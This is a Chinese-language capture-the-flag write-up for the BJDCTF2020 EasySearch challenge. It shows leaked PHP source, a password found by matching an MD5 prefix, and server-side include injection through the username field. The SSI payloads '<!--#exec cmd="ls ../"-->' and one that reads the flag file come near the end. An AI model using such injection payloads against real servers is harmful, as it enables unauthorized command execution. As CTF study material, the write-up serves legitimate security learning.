本文详细介绍了BJDCTF2020 EasySearch挑战中的安全漏洞,包括为何不是SQL注入以及如何利用dirsearch和御剑扫描隐藏文件。讲解了如何通过构造特殊用户名进行SSI注入,从而读取flag。同时,提供了利用Python进行密码匹配的思路。
[BJDCTF2020]EasySearch
感觉不像SQL注入,扫一下后台文件,这里我用dirsearch和御剑都没扫出来。网上看了别人的说是御剑能扫出来index.php.swp(是我版本太老了吗?)
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
先过第一关,让password的md5字符串前6位等于6d0bc1,用python写脚本跑一下
用2020666作为password登陆一下,可以看到成功进入下一步
接下来是一个新的知识点:SSI注入,和SSTI注入很像,它是指被嵌入在html页面中的可执行代码被执行产生的漏洞。在这道题中,当我们的password通过时,它会打开一个file_shtml文件,并且写入我们输入的username,这就造成了可注入。
这是正常的用户名:
换成username=<!--#exec cmd="ls ../"-->
username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->拿到flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
